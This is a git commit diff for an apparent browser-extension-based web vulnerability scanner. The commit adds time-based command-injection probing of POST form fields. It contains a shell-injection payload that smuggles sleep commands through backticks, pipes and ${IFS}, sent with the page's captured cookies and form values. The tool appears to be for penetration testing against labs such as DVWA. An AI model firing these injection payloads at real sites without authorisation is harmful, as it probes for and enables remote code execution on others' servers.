POST Scan RCE + Bugfix: Handling ALL data for POST
parent
d46a0edb79
commit
43e7eb8f06
|
@ -115,10 +115,12 @@ chrome.tabs.onUpdated.addListener(function(tabId,changeInfo, tab) {
|
||||||
|
|
||||||
// Detect value of inputs of the form
|
// Detect value of inputs of the form
|
||||||
post_data = '';
|
post_data = '';
|
||||||
for (var j = 0; j < document.forms[i-1].elements.length -1; j++) {
|
for (var j = 0; j < document.forms[i-1].elements.length; j++) {
|
||||||
post_data += (document.forms[i-1].elements[j].name+":"+document.forms[i-1].elements[j].value+"|");
|
post_data += (document.forms[i-1].elements[j].name+":"+document.forms[i-1].elements[j].value+"|");
|
||||||
|
console.log(post_data);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
// Send data to this plugin (POST Scan) - check the method, GET is already handle with onUpdated
|
// Send data to this plugin (POST Scan) - check the method, GET is already handle with onUpdated
|
||||||
if(post_data != '' && document.forms[i-1].method.toUpperCase() == 'POST'){
|
if(post_data != '' && document.forms[i-1].method.toUpperCase() == 'POST'){
|
||||||
chrome.runtime.sendMessage({type: "scan_plz", data:post_data, url:document.location.href, cookie:document.cookie}, function() {});
|
chrome.runtime.sendMessage({type: "scan_plz", data:post_data, url:document.location.href, cookie:document.cookie}, function() {});
|
||||||
|
|
|
@ -50,7 +50,7 @@ You can try the Error SQL, Blind SQL, LFI with Damn Vulnerable Web App
|
||||||
|
|
||||||
## TODO - Work in progress
|
## TODO - Work in progress
|
||||||
- Should detect target in source code.. (list of targets, then launch scan)
|
- Should detect target in source code.. (list of targets, then launch scan)
|
||||||
- Do scan_rce/xss for POST with data dict
|
- Do xss for POST with data dict
|
||||||
|
|
||||||
## Thanks
|
## Thanks
|
||||||
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
|
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
|
||||||
|
|
|
@ -159,21 +159,35 @@ def scan_rce(method, vulns, url, fuzz, cookie, useragent, data):
|
||||||
4 : commande introuvable
|
4 : commande introuvable
|
||||||
"""
|
"""
|
||||||
# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4"
|
# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4"
|
||||||
payload = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4"
|
payload_post = '`#\'|sleep${IFS}4|\'`"|sleep${IFS}4|";sleep${IFS}4'
|
||||||
|
payload_get = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4"
|
||||||
|
|
||||||
# Do a request and check the response time
|
# POST
|
||||||
inject = url.replace(fuzz+"=", fuzz+"="+payload)
|
if (method == 'POST'):
|
||||||
time1 = datetime.datetime.now()
|
inject = dict(data)
|
||||||
content = requests.get(inject, cookies=cookie, headers={'user-agent': useragent}).text
|
inject[fuzz] += payload_post
|
||||||
|
time1 = datetime.datetime.now()
|
||||||
|
content = requests.post(url, data=inject ,cookies=cookie, headers={'user-agent': useragent} ).text
|
||||||
|
|
||||||
|
# Change the inject to have a nice display in the plugin
|
||||||
|
inject = url + ":" + fuzz + ":" + inject[fuzz]
|
||||||
|
|
||||||
|
# GET
|
||||||
|
else:
|
||||||
|
# Do a request and check the response time
|
||||||
|
inject = url.replace(fuzz+"=", fuzz+"="+payload_get)
|
||||||
|
time1 = datetime.datetime.now()
|
||||||
|
content = requests.get(inject, cookies=cookie, headers={'user-agent': useragent}).text
|
||||||
|
|
||||||
|
|
||||||
|
# Check - The payload will force a delay of 5s at least.
|
||||||
time2 = datetime.datetime.now()
|
time2 = datetime.datetime.now()
|
||||||
diff = time2 - time1
|
diff = time2 - time1
|
||||||
diff = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
|
diff = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
|
||||||
|
|
||||||
# The payload will force a delay of 5s at least.
|
|
||||||
if diff > 2:
|
if diff > 2:
|
||||||
print "\t\t\033[93mRCE Detected \033[0m for ", fuzz, " with the payload :", payload
|
print "\t\t\033[93mRCE Detected \033[0m for ", fuzz, " with the payload :", payload_get
|
||||||
vulns['rce'] += 1
|
vulns['rce'] += 1
|
||||||
vulns['list'] += 'RCE|TYPE|'+inject+'|DELIMITER|'
|
vulns['list'] += 'RCE|TYPE|'+inject+'|DELIMITER|'
|
||||||
|
|
||||||
else:
|
else:
|
||||||
print "\t\t\033[94mRCE Failed \033[0m for ", fuzz, " with the payload :", payload
|
print "\t\t\033[94mRCE Failed \033[0m for ", fuzz, " with the payload :", payload_get
|
||||||
|
|
Loading…
Reference in New Issue